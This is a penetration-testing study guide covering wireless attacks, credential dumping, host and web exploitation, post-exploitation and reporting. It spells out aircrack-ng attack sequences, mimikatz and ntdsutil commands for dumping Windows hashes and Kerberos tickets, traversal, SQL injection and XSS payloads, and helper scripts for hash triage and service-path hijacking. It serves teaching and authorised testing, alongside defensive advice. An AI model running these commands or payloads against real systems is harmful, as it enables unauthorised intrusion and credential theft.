  • Aircrack-ng
  • WIFI Pumpkin
  • Wifi Pineapple

Attacks and Techniques

  • Wireless Sniffing
  • WAP
  • Replay
  • WEP
  • Fragmentation
    • PRGA Attack
  • Jamming
    • Check the legality of running this attack
    • De-Auth
    • Tools
      • Wifi Jammer Python Script
      • Aircrack-ng
      • Wireless Pineapple
  • Tools
    • Aircrack-ng
  • Evil Twins
    • Creation of an attacker owned network with the same SSID as the target environment
    • To detect use Wigle, Kismet, Airmon-ng etc.
      • Tools
        • Wifi Pineapple
  • WPS Attacks
    • WPS uses 7 characters
    • It only checks the first 4 digits before checking the last 3
    • The time to crack is very small
  • Bluetooth
    • Bluejacking Attacks (around 30 feet range)
      • Transmit images, messages, videos etc.
      • Send contacts with spoofed contact names (the target sees the spoofed name as a message)
      • Can be used in connection with phishing/cred harvesting etc.
    • BlueSnarfing
      • Gather data
      • OBEX Push Profile (OPP)
      • OBEX GET
      • Get files such as contacts etc.

Lab Activities

  • WAP Replay Attack
  • WPA2 Cracking
  • IRL: Bettercap

Replay Steps

airmon-ng check kill

#enable monitor mode (promiscuous)

airmon-ng start wlan0

airodump-ng wlan0mon

#Find a WPA network to replay

airodump-ng --bssid BSSIDMAC -c 6 --write output wlan0mon

#start the replay attack by authenticating (-1 = fake authentication)

aireplay-ng -1 0 -a BSSIDMAC -e SSIDName wlan0mon

#send ARP requests (type3)

aireplay-ng -3 -b BSSIDMAC wlan0mon

aireplay-ng -1 0 -a BSSIDMAC -e SSIDName wlan0mon

# this attack takes some time and requires other clients

#now we crack the hashes

aircrack-ng -b BSSIDMAC output-01.cap

Fragmentation Attacks

airmon-ng check kill

aireplay-ng -5 -b BSSIDMAC -e SSIDName -h SOURCEMAC wlan0 --write output

packetforge-ng -0 -a BSSIDMAC -h SOURCEMAC -y output-01.cap -w prgaOutput

aireplay-ng -r prgaOutput wlan0


#enable monitor mode



#kill network management services

airmon-ng check kill

#enable monitor mode

airmon-ng start wlan0


airodump-ng wlan0mon

#run with output saved (csv, pcap etc.)

airodump-ng wlan0mon -w pwnWIFI

#RUN Airodump Scan Visualizer –

#Load the CSV

Specialist Systems

Mobile Systems

  • Android
  • iOS

Industrial Control Systems (ICS) and SCADA (supervisory control and data acquisition)


  • Control Physical Devices
  • Tools
    • ICSExploit


Supervisory control and data acquisition

  • SCADA Manages ICS

Embedded Systems

  • Industrial Systems

Real-Time OSs (RTOS)

Often does not include security features.

Internet of Things (IoT)

Mirai botnet created from DVRs and Baby Monitors etc.

  • Buffer Overflows
  • Command Injection
  • SQL injection
  • Syn Floods etc.

Point of Sale Systems

  • Tablets
  • Custom Devices
  • Payments taken (so PCI-DSS may be in scope)
  • Some powered by PIs etc.

Host based Exploitation

Exploiting hosts includes systems such as:

  • Windows
  • macOS (BSD based)
  • Linux
  • Android
  • iOS

Linux Package Managers

  • apt (Debian/Ubuntu) – Advanced Package Tool
  • aptitude (Debian/Ubuntu) – text-mode (ncurses) front end to the same package system
  • dpkg (Debian/Ubuntu) – the low-level .deb tool that apt sits on top of
  • yum (CentOS/RHEL) – Yellowdog Updater, Modified (succeeded by dnf)
  • yast (SUSE)
  • rpm (Red Hat) – RPM Package Manager, the low-level tool that yum sits on top of
  • pacman (Arch Linux)

Windows Systems and Vulnerabilities

  • Windows is largely written in C and C++ (no bounds checking by default, which leads to memory-corruption vulnerabilities)
  • Requires developers to code securely
  • Closed source (source code is private)
  • Windows 10 is > 50 million lines of code
  • Reliant on the vendor for patching (although third-party micropatching is a thing)

Types of Vulnerability

  • Remote Code Execution
  • Buffer Overflow
  • Denial of Service (DoS)
  • Memory Corruption
  • Privilege Escalation
  • Information Disclosure
  • Security Feature Bypasses (e.g. UAC Bypass)

Web Application Vulnerabilities

  • Cross Site Scripting (XSS)
  • Directory Traversal
  • XSRF (Cross Site Request Forgery)

Go and see the OWASP Top 10

Common Windows Exploit Examples

These are old vulnerabilities which might be useful for the exam, but it's also good to know the history of common vulnerabilities:

  • IIS 5.0 Unicode directory traversal
  • IIS 5.0 WebDAV buffer overflow
  • RPC DCOM (MS03-026) buffer overflow, RCE over RPC (used by the Blaster worm)
  • Server service NetAPI over SMB (MS08-067) buffer overflow, RCE (used by Conficker)
  • Null sessions
  • LM password hash weaknesses

More modern examples

Dumping Hashes & Password Cracking

  • Local account hashes (stored in the SAM database)
  • SYSKEY/boot key (derived from the SYSTEM registry hive; needed to decrypt the SAM)
  • Active Directory passwords
    • Stored in NTDS.DIT
      • MD4 (NT hash)
      • LM
      • DES_CBC_MD5 (Kerberos key)
      • AES256_CTS_HMAC_SHA1 (Kerberos key)
      • MD5 (WDigest)
      • Reversible encryption (clear-text password, only if that option is enabled on the account)
  • Certificates
  • Kerberos tickets
  • LSA secrets

Where credentials come from

  • Steal creds from files (e.g. GPP cpassword, Sysprep/unattend files)
  • Dump creds from running processes (LSASS)
  • Dump process memory from disk artefacts (hibernation files, VM memory files, crash dumps)
  • Dump creds from the SAM
  • Dump creds from the registry
  • Dump from NTDS.dit
  • Domain Controller replication (DCSync with Mimikatz/Impacket)
  • Keylogging
  • Social engineering

Windows Credential Dumping

Dump the SAM

Registry export (run as administrator; the SYSTEM hive holds the boot key needed to decrypt the SAM and SECURITY hives, so export it too)

reg save HKLM\SAM C:\temp\sam.save

reg save HKLM\SYSTEM C:\temp\system.save

reg save HKLM\SECURITY C:\temp\security.save

#read these offline using mimikatz (lsadump::sam /sam:sam.save /system:system.save) or impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

Think about running mimikatz on an attacker owned system against the exported hives, to avoid dropping it to disk on the target or being detected/having to disable antivirus

Dumping Passwords Live

(run mimikatz as admin)

Dump LogonPasswords

#enable debug privs

privilege::debug

#log to a file

log mimilog.log

#dump logon passwords/hashes held by LSASS

sekurlsa::logonpasswords

Dump SAM File and Kerberos Tickets

#enable debug privs

privilege::debug

#impersonate SYSTEM (needed to read the SAM on a live system)

token::elevate

#log to a file

log mimilog.log

#dump the local SAM hashes

lsadump::sam

#export the Kerberos tickets in memory to .kirbi files

sekurlsa::tickets /export


Dumping NTDS.DIT

Note: ntds.dit is locked while the domain controller is running, so we need to create a COPY (volume shadow copy, ntdsutil IFM, NinjaCopy etc.) or take it from a backup. The SYSTEM hive is needed as well (it holds the boot key), and ideally SECURITY.

#example with ntdsutil creating an "install from media" snapshot: ntds.dit lands in c:\temp\Active Directory\ and the SYSTEM/SECURITY hives in c:\temp\registry\

ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" q q

#Extract hashes using DSInternals (PowerShell; Get-ADDBAccount is a DSInternals cmdlet, not PowerSploit). The boot key is read from the exported SYSTEM hive first

$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'

Get-ADDBAccount -All -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key

#Extract using Impacket (offline, on the attacker machine)

impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
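Once the hashes are out, the first thing to do is triage them. The following Python block is an added example for these notes (not impacket's or DSInternals' own code): it parses secretsdump-style `domain\user:RID:LMHASH:NTHASH:::` lines and flags blank passwords, accounts that still carry a real LM hash, the RID-500 built-in administrator (whatever it has been renamed to) and password reuse (identical NT hashes across accounts). The sample dump inside it is constructed for the demo.

```python
"""Triage the output of impacket-secretsdump (or any tool printing the same format).

Added example for these notes, not impacket's or DSInternals' own code. The
input lines follow secretsdump's standard "domain\\user:RID:LMHASH:NTHASH:::"
format; the sample dump below is constructed for the demo.
"""
import re
from collections import defaultdict

# LM hash of an empty/absent password and NT hash of the empty string (well-known constants)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample: banner lines, four accounts and a trailer, as secretsdump prints them
SAMPLE_DUMP = """[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
corp.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
corp.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
corp.local\\svc_backup:1104:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
corp.local\\jsmith:1105:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
[*] Cleaning up...
"""


def parse_dump(text):
    """Yield one dict per well-formed hash line; banners and noise are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"] = d["lm"].lower()
            d["nt"] = d["nt"].lower()
            yield d


def triage(text):
    """Return the quick wins a tester looks for first in an NTDS/SAM dump."""
    findings = {"empty_password": [], "lm_present": [], "builtin_admin": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for e in parse_dump(text):
        by_nt[e["nt"]].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings["empty_password"].append(e["user"])   # blank password
        if e["lm"] != EMPTY_LM:
            findings["lm_present"].append(e["user"])       # real LM hash: password <= 14 chars, trivially cracked
        if e["rid"] == 500:
            findings["builtin_admin"].append(e["user"])    # built-in Administrator, whatever it is named
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings["shared_nt"][nt] = sorted(users)      # same NT hash means the same password is reused
    return findings


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(key, value)
```

Feed it the real secretsdump output with `triage(open("hashes.txt").read())`; the shared-NT finding is usually the most valuable one, because one cracked password then opens every account in that group.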

Common nix Vulnerabilities

  • Kernel and core utilities written in C (no bounds checking)
  • Open source, but development and patching quality are inconsistent across projects
  • Linux and Android allow sideloading of software
  • Common vulnerabilities
    • POODLE (SSLv3)
    • Heartbleed (OpenSSL)
    • XSS/XSRF (web stacks hosted on Linux)
    • SQL Injection
    • Samba (SMB) overflows
    • Enumeration


  • GNU is an operating system
  • Linux is a KERNEL (A component of the OS)

Common Exploits

  • DirtyCow (Copy on Write race, CVE-2016-5195)
  • Five Year Bug (2009)
  • Remote root flaws
  • Insecure sudo configuration (sudoers rules)
  • Insecure sudo binaries (binaries that can be abused to spawn a shell)
  • Sticky bits
  • SUID bit set

Password Cracking for Linux

Credentials are stored in:

  • /etc/passwd (accounts; world readable)
  • /etc/shadow (password hashes; readable by root only)

On older Unix/Linux systems the password hashes lived in the world-readable /etc/passwd; shadow passwords moved them into /etc/shadow.

  • Tools: unshadow (combines passwd and shadow into one file for John)
  • Meterpreter: hashdump
  • Mimipenguin (recovers clear-text passwords from process memory)
  • Password hashes can be passed as well, e.g. against Samba (pass-the-hash)
  • Key logging

Password Hash Types (NIX)

The $id$ prefix of the password field in /etc/shadow identifies the algorithm:

$1$ = MD5-crypt

$2a$ / $2b$ / $2y$ = bcrypt (Blowfish)

$5$ = SHA-256-crypt

$6$ = SHA-512-crypt

$y$ = yescrypt (the default on recent Debian/Ubuntu)
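The following Python block is an added example for these notes (not John the Ripper's unshadow) that puts the table above to work: it classifies each /etc/shadow field by its $id$ prefix, flags empty passwords and weak (MD5-crypt) hashes, and rebuilds a John-style unshadow file from passwd + shadow. The passwd/shadow lines inside it are constructed and the hash bodies are placeholders, not real hashes of any password.

```python
"""Classify /etc/shadow password fields by their $id$ prefix and rebuild a
John-style "unshadow" file. Added example for these notes, not John the
Ripper's unshadow; the passwd/shadow lines are constructed and the hash
bodies are placeholders, not real hashes of any password."""

# crypt(3) identifiers as they appear in the $id$salt$hash field
HASH_IDS = {
    "1": "md5crypt (MD5)",
    "2a": "bcrypt (Blowfish)",
    "2b": "bcrypt (Blowfish)",
    "2y": "bcrypt (Blowfish)",
    "5": "sha256crypt (SHA-256)",
    "6": "sha512crypt (SHA-512)",
    "7": "scrypt",
    "y": "yescrypt",
}
WEAK_IDS = {"1"}   # md5crypt is fast to brute force; treat it as a finding

# Constructed sample files
PASSWD = """root:x:0:0:root:/root:/bin/bash
legacy:x:1001:1001::/home/legacy:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
guest:x:1002:1002::/home/guest:/bin/sh
"""
SHADOW = """root:$6$saltsalt$PLACEHOLDERHASHBODY:19000:0:99999:7:::
legacy:$1$ab$PLACEHOLDER:19000:0:99999:7:::
backup:*:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""


def classify_hash(field):
    """Return (algorithm, state) for one shadow password field."""
    if field == "":
        return ("none", "empty-password")          # logs in with no password at all
    if field[0] in "!*":
        return ("none", "locked")                  # no valid hash, account cannot log in with a password
    if field.startswith("$"):
        ident = field.split("$")[1]
        return (HASH_IDS.get(ident, "unknown $" + ident + "$"), "active")
    if len(field) == 13:
        return ("descrypt (DES, 8-char limit)", "active")   # legacy 13-character traditional crypt
    return ("unknown", "active")


def parse_shadow(text):
    """Map user -> password field."""
    hashes = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text, shadow_text):
    """Merge like unshadow(8): each passwd line with its 'x' replaced by the real hash."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if line:
            fields = line.split(":")
            fields[1] = hashes.get(fields[0], fields[1])
            merged.append(":".join(fields))
    return merged


def audit(shadow_text):
    """Findings a tester reports from a shadow file: empty passwords and weak hash types."""
    findings = {"empty": [], "weak": [], "algorithms": {}}
    for user, field in parse_shadow(shadow_text).items():
        algo, state = classify_hash(field)
        findings["algorithms"][user] = algo
        if state == "empty-password":
            findings["empty"].append(user)
        if field.startswith("$") and field.split("$")[1] in WEAK_IDS:
            findings["weak"].append(user)
    return findings


if __name__ == "__main__":
    print("\n".join(unshadow(PASSWD, SHADOW)))
    print(audit(SHADOW))
```

The merged lines are what you would write to a file and hand to `john` (or, with the hash alone, to `hashcat -m 1800` for sha512crypt); the audit output goes straight into the findings list.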

Protocol Exploitation

Windows

  • Unnecessary services
    • IIS installed by default on Windows 2000 Server
  • SMB 1.0 (no longer installed by default from Windows 10 1709 (Fall Creators Update) onwards)
  • Domain account password caching
    • 10 domain logons cached by default (CachedLogonsCount)
    • Default accounts
      • Administrator (SID starting "S-1-5-21" and ending "-500")
      • Guest (SID starting "S-1-5-21" and ending "-501")
  • Weak default security logging

Linux (nix)

  • User home permissions
  • World-readable and writeable directories/files
  • Insecure mount/export options (e.g. NFS exports with no_root_squash)
  • Services with weak default settings
  • Apps with weak default settings

Protocols and Services

Windows

  • Supports multiple protocols and configurations
  • Provides software for most services (from Microsoft)

Linux (nix)

  • Supports multiple protocols and configurations
  • Depends on 3rd parties for most services

LAB Activity

Windows

  • Install Windows roles and features
    • Install IIS
    • Install NFS

Linux (nix)

  • Install Apache2
  • Install Terminator

Windows 7

  • Exploit MS17-010 (EternalBlue) in the lab using Metasploit
  • Exploit MS17-010 in the lab using a python exploit

File Permissions and Exploitations

Windows

  • File permissions (ACLs)
  • Share permissions
  • Alternate Data Streams (ADS)
    • NTFS files can have more than one data stream
      • The default (unnamed) $DATA stream, which is what you normally see
      • Named alternate streams (you can hide data in an ADS, e.g. a binary inside a txt file: file.txt:payload.exe)
  • Unquoted service path privilege escalation
    • Metasploit
    • PowerSploit
  • DLL hijacking
  • NTFS encryption bypass
  • SAM/SYSKEY offline attacks
  • EFS
    • Copying EFS-encrypted files to a network share or non-NTFS volume writes them out in the clear (if the copying user can decrypt them)
  • BitLocker exploits
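The unquoted service path bullet above is worth seeing as logic rather than as a tool name. The following Python block is an added example for these notes (not PowerSploit's or Metasploit's check): given a service ImagePath it decides whether the path is exploitable and lists, in the order the Service Control Manager tries them, the file names an attacker could drop. The ImagePath strings are constructed; on a real host you would feed in values from `wmic service get name,pathname` (or `Get-CimInstance Win32_Service`) and the writable-directory list from `icacls`.

```python
"""Work out where an unquoted Windows service path can be hijacked.

Added example for these notes (not PowerSploit's or Metasploit's own check).
The ImagePath strings are constructed; on a real host you would feed in
values from `wmic service get name,pathname` or Get-CimInstance Win32_Service
and the writable-directory list from icacls."""
import ntpath


def binary_part(image_path):
    """The executable portion of an ImagePath, with any service arguments dropped."""
    p = image_path.strip()
    end = p.lower().find(".exe")
    return None if end == -1 else p[: end + 4]


def is_vulnerable(image_path):
    """Unquoted, and a space appears somewhere before the .exe: the classic misconfiguration."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    binary = binary_part(p)
    return binary is not None and " " in binary


def hijack_candidates(image_path):
    """Paths the Service Control Manager tries, in order, before the intended binary.

    For C:\\Program Files\\Vuln App\\bin\\svc.exe the SCM tries C:\\Program.exe,
    then C:\\Program Files\\Vuln.exe, and only then the real file.
    """
    if not is_vulnerable(image_path):
        return []
    binary = binary_part(image_path)
    # every prefix that ends just before a space is treated as "<prefix>.exe" with the rest as arguments
    return [binary[:i] + ".exe" for i, ch in enumerate(binary) if ch == " "]


def writable_candidates(image_path, writable_dirs):
    """Keep only the candidates whose parent directory the low-privileged user can write to."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    return [c for c in hijack_candidates(image_path)
            if ntpath.dirname(c).lower().rstrip("\\") in writable]


if __name__ == "__main__":
    path = r"C:\Program Files\Vuln App\bin\svc.exe -k netsvcs"
    print(hijack_candidates(path))
    print(writable_candidates(path, [r"C:\Program Files"]))
```

A candidate is only useful if its directory is writable by you and the service runs as SYSTEM (or another more privileged account) and can be restarted; `writable_candidates` covers the first condition, the other two you check with `sc qc` and `sc stop/start`.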


Linux (nix)

  • Insecure permissions
  • Sticky bit
  • Symbolic link/broken symbolic link exploitation
  • Secure Shell escapes (e.g. breaking out of restricted shells)

Linux Sensitive Files

  • /etc/profile
  • /etc/hosts
  • /etc/resolv.conf
  • /etc/pam.d
  • ~/.bash_profile
  • ~/.bash_login
  • ~/.profile
  • /home


Kernel Vulnerabilities and Exploits

  • Privilege Escalation
  • DoS

Memory Vulnerabilities

  • RCE
  • DoS
  • Common Vulns
    • Use-After-Free
    • Buffer Overflow

Default Accounts

Windows

  • Administrator
  • Guest
  • DefaultAccount
  • WDAGUtilityAccount
  • defaultuser0

Linux (nix)


  • root
  • adm
  • nobody
  • sshd
  • lp
  • uucp



Sandboxes and Restricted Contexts

  • Guest
  • Low priv users (e.g. IUSR/IIS_IUSRS)
  • Virtual machines
  • Browser sandboxes
  • Adobe Flash sandbox
  • Containers
    • Docker
    • Hyper-V containers
  • Mobile apps
  • PDF and documents
  • Antivirus quarantine features
  • Defender SmartScreen
  • Mail program sandboxes

Escape Techniques

  • Sleeps
  • Large Files
  • Polymorphic Malware
  • Rootkits/bootkits
  • Encryption
  • Logic Bombs
  • Archive Tools
  • Binary Packers
  • Network Fast Flux (Rotating IPs or jumping hosts)
  • Sandbox Detection/Evasion


macOS and iOS

macOS (OS X) is based on BSD (Unix)

  • IOMobileFrameBuffer kernel driver vulnerabilities (iOS)
  • High Sierra root login with NO password (macOS 10.13)
  • Mactans
    • Malicious USB charger attack (iOS)
  • Jailbreaking iOS
    • KeyRaider (malware that targeted jailbroken devices)
  • Thunderstrike
    • Thunderbolt Option ROM bootkit (OS X firmware)
  • iCloud API vulnerabilities
  • MaControl backdoor (OS X)
  • Graphics driver vulnerabilities (iOS)


Android and Mobile Devices

  • Theft
  • Lack of encryption
  • Side-loading apps
  • Rooted devices
  • Weak or no passwords
  • Biometric bypass
  • SQLite injection
  • Excessive app permissions
  • Insecure application communications
  • No or disabled security tools e.g. antivirus
  • Missing patches/out of date software
  • QuadRooter
    • Qualcomm chipset vulnerabilities
  • Certifi-gate mRST (mobile Remote Support Tool) flaw
    • Privilege escalation via trusted support-tool plugins (< Lollipop (5.1))
  • Stagefright MMS privesc and RCE (< Lollipop (5.1))
  • Installer hijacking
  • TowelRoot (< KitKat (4.4))
  • Cross-platform vulnerabilities
    • DirtyCow
    • POODLE

Physical Attacks

  • Unencrypted Storage
  • Cold Boot Attacks
    • Recover keys from RAM
  • Insecure Serial Console (with no authentication)
  • JTAG Access/Debugging

Common Cracking Tools

  • Hashcat
    • Windows
    • Linux
  • John The Ripper (John)

Attacking Applications and Web Applications

Common Protocols & Languages

  • HTTP
  • HTML
  • Javascript
  • SQL Databases
  • Frameworks
    • Node.js
    • Angular
    • Django
  • Python
  • PHP

Common Web Application Vulnerabilities

  • Weak security configurations (misconfigurations)
  • Broken authentication
  • XSS
  • CSRF
  • Clickjacking
  • File inclusion
  • Weak coding practices

Common Misconfigurations

  • Rolling your own encryption
  • Legacy content
  • Debugging modes enabled
  • Unpatched vulnerabilities/using software with known vulnerabilities
  • Client-side processing
  • Default admin accounts
  • Insecure cookies
  • Directory traversal
    • Read or execute files outside the web root
    • E.g. ../../../etc/passwd
    • E.g. URL-encoded: %2E%2E%2F%2E%2E%2FWindows/System32/cmd.exe (%2E = ., %2F = /)
    • Double encoding (defeats a filter that decodes only once)
      • %25 = %
      • E.g. %252E%252E%252F%252E%252E%252FWindows/System32/cmd.exe
    • Null byte encoding %00 (truncates the path in older runtimes so an appended extension is ignored)
      • E.g. index.php?file=../../etc/passwd%00
    • Test using
      • BURP
      • OWASP ZAP
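The following Python block is an added example for these notes (not Burp's or ZAP's logic) showing the server side of the traversal bullets above: how a path has to be fully decoded and normalised before it is compared against the web root, why a check that decodes once and looks for `..` misses the double-encoded payload, and how `%00` is handled. WEB_ROOT and the payloads are constructed.

```python
"""Normalise a user-supplied file name the way a traversal check has to before
comparing it against the web root, and show why a single-pass decode misses
the double-encoded payloads from the notes. Added example for these notes;
WEB_ROOT and the payloads are constructed."""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html/files"


def fully_decode(value, max_rounds=5):
    """Undo layered percent-encoding (%252E -> %2E -> .) until nothing changes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def naive_is_traversal(value):
    """The check that gets bypassed: one decode, then look for '..'."""
    return ".." in unquote(value)


def resolve(user_path, root=WEB_ROOT):
    """Return (resolved_path, is_traversal); a None path means the request must be rejected."""
    decoded = fully_decode(user_path)
    if "\x00" in decoded:
        return (None, True)               # %00 truncation: never let a null byte reach the filesystem API
    decoded = decoded.replace("\\", "/")  # treat Windows separators the way IIS/PHP on Windows would
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    inside = candidate == root or candidate.startswith(root + "/")
    return (candidate, not inside)


if __name__ == "__main__":
    for p in ["report.pdf", "../../../../etc/passwd",
              "%2E%2E%2F" * 4 + "etc/passwd", "%252E%252E%252F" * 4 + "etc/passwd",
              "../../etc/passwd%00.pdf"]:
        print(p, "->", resolve(p), "| naive check says", naive_is_traversal(p))
```

When testing, the double-encoded variant is the one to try whenever the plain `../` is blocked: if the application's filter runs before its framework decodes the parameter a second time, `naive_is_traversal` is effectively what you are up against.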

LAB Tasks

  • Test out BURP
  • Test out OWASP ZAP
  • Try manual identification of a path traversal

Common Web Application Attacks

Authentication & Authorisation Attacks

  • Brute force
  • Credential stuffing
  • Weak passwords
  • Session hijacking
  • MiTM
  • XSS cookie theft
  • Bypass authentication
  • Redirection attack
  • ReturnURL attack
  • HTTP Parameter Pollution (HPP)
  • IDOR

Injection Attacks

  • Command Injection
  • SQLi
    • Test using a single quote (') in a form POST/GET parameter and look for an error or a change in behaviour
    • Logic injection: ' OR 1=1--

HTML Injection

Inject HTML, e.g. links or embedded forms (used for clickjacking/phishing), into areas such as forums where user content is rendered.

Cross Site Scripting (XSS)

There are a few types of XSS:

  • Stored (persistent)
  • Reflected (input is reflected in the response and executes there)
  • Blind (stored XSS that fires in a context the attacker cannot see, e.g. an admin panel)
  • DOM-based

An example of an XSS payload = <script>alert('This site is vulnerable to XSS!');</script>

Cross Site Request Forgery (XSRF)

Getting a user's browser to send a request to another site where they are already logged in, e.g. the user visits a phishing site and clicks a link to the benign site, and an unwanted action is performed with their session, such as adding extra quantities of items to a shopping basket.

Clickjacking

Setting up an iframe on a malicious site to embed content and masquerade as the real site, so the victim clicks on what they think is the real page. Can be used with phishing or social engineering.

Other Vulnerabilities/Exploits

  • File Inclusions
  • Local File Inclusion
  • Remote File Inclusion
  • Insecure Direct Object Reference (IDOR)
  • Logic Errors
  • Timing Issues (Race Conditions)
  • No Error handling
  • Insecure Functions
  • Insecure APIs
  • Insecure Credential Storage/Transmission
  • Sensitive Information Disclosure

Lab Work

  • Learn to use SQLMAP
  • Run SQLMAP through BURP to understand how it works
  • Run a manual authentication bypass using SQL injection
  • Test manual exploitation using union selects
  • Test path traversal to read /etc/passwd
  • Demonstrate a self-reflected XSS alert
  • Demonstrate a stored XSS alert
  • Demonstrate using a stored XSS using BEEF

Source Code Analysis and Compiled Apps

Static Code Analysis

Source code review while it's not executing

  • Manual source code review
  • Tool based review (SAST – Static Application Security Testing)

Dynamic Code Analysis

  • Testing the running application (DAST – Dynamic Application Security Testing)

Fuzzing

Fault injection. Random or malformed data is sent to the app looking for crashes or unexpected responses.

Reverse Engineering

  • Debugging
    • Immunity Debugger
    • Ghidra
    • WinDbg
    • OllyDbg
    • GDB
    • IDA/IDA Pro
  • Decompiling
    • Reversing a compiled binary and converting it back to (approximate) source code
      • Hex-Rays decompiler (IDA)
      • VB Decompiler
      • Delphi decompilers
      • CFF Explorer (PE inspection)
      • JetBrains dotPeek (.NET)
  • Disassembly
    • Translating machine code into assembly code

Post Exploitation

Once you have access to a target you will continue to enumerate (recon) from the inside.

Lateral Movement

  • Netcat
    • Bind shells
    • Reverse shells
  • SSH
    • SSH keys
    • authorized_keys / known_hosts
  • VPN
  • Routing tables (pivoting into other subnets)
  • Metasploit port forwarding/pivoting (portfwd, autoroute)

Maintaining Persistence

  • Create a backdoor account
  • Create a service/daemon
  • Backdoors
  • VPNs
  • Scheduled Tasks/Cron Jobs
  • Login scripts, Login Tasks, Start-up Tasks etc.
  • Rootkits
    • Firmware
    • Kernel
    • Filter Drivers
  • Implants

Evading Security Solutions & Anti-Forensics

  • Buffer Overflows
  • Memory Resident Malware
  • Packing
  • Virtual Machine Detection
  • Clearing Logs
    • Whole Log
    • Specific Log
  • Shredding Files
  • File Metadata Tampering
  • Log Tampering

Penetration Test Reporting

Key Areas

  • Categorisation
  • Prioritisation
  • Recommendations

Report Format

  • Executive Summary
  • Technical Findings
  • Recommendations


  • People
  • Process
  • Technology
  • Customer Business Context
  • Customer Industry

Prioritising Findings

  • Likelihood
  • Impact
  • CVSS Score etc.

Credential Storage & Transport Recommendations

  • Don't hardcode credentials in apps
  • Salt (random, per user) and hash passwords with a slow hash
  • Use strong encryption, avoid weak hashes (MD5, SHA-1, LM)
  • Use secure transport e.g. do NOT use FTP, use FTPS/SFTP
  • Don't use protocols that use weak ciphers
  • Avoid configurations that allow for downgrade attacks
  • Monitor for unencrypted traffic
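The salt-and-hash bullet above, as an added example for these notes (standard-library Python, not any framework's own implementation): a random per-user salt, a deliberately slow KDF (PBKDF2-HMAC-SHA256, which is what the standard library offers), a constant-time comparison, and a check that lets you raise the iteration count later and re-hash on the next login. The `pbkdf2_sha256$iterations$salt$hash` record format is a constructed convention for the demo.

```python
"""Random per-user salt, a deliberately slow KDF (PBKDF2-HMAC-SHA256 from the
standard library) and a constant-time comparison. Added example for these
notes; the storage format string is a constructed convention for the demo."""
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # OWASP's 2023 recommendation for PBKDF2-HMAC-SHA256


def hash_password(password, iterations=ITERATIONS, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt>$<hash>' with a fresh 16-byte salt per call."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare without leaking timing."""
    try:
        algo, iterations, b64salt, b64dk = stored.split("$")
    except ValueError:
        return False                      # malformed record: fail closed
    if algo != "pbkdf2_sha256":
        return False
    salt, expected = base64.b64decode(b64salt), base64.b64decode(b64dk)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)   # constant-time, so a wrong byte early does not return faster


def needs_rehash(stored, minimum=ITERATIONS):
    """True if the record was hashed with fewer iterations than policy now demands (upgrade on next login)."""
    parts = stored.split("$")
    return len(parts) != 4 or parts[0] != "pbkdf2_sha256" or int(parts[1]) < minimum


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record), verify_password("Tr0ub4dor&3", record))
```

Two identical passwords produce different records because of the salt, which is what stops an attacker cracking one hash and getting every account that shares the password; the constant-time compare matters less for password hashes than for tokens, but it costs nothing to do it right.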

Authentication Recommendations

  • Use multi-factor authentication
    • Something you know
    • Something you have
    • Something you are
  • Smart cards, smartphone apps, key fobs (like YubiKey), OTP tokens (RSA SecurID)

Input and Output Sanitisation

  • Escape characters/encode output to stop HTML being rendered
    • E.g. htmlspecialchars() function of PHP
    • HTML sanitizers (libraries)
      • OWASP Java HTML Sanitizer
      • .NET HtmlSanitizer
      • HTML Purifier (PHP)
      • SanitizeHelper for Ruby on Rails
    • Convert HTML to markdown
    • Strip NULL bytes from input (older runtimes such as PHP before 5.3.4 truncated file names at %00)
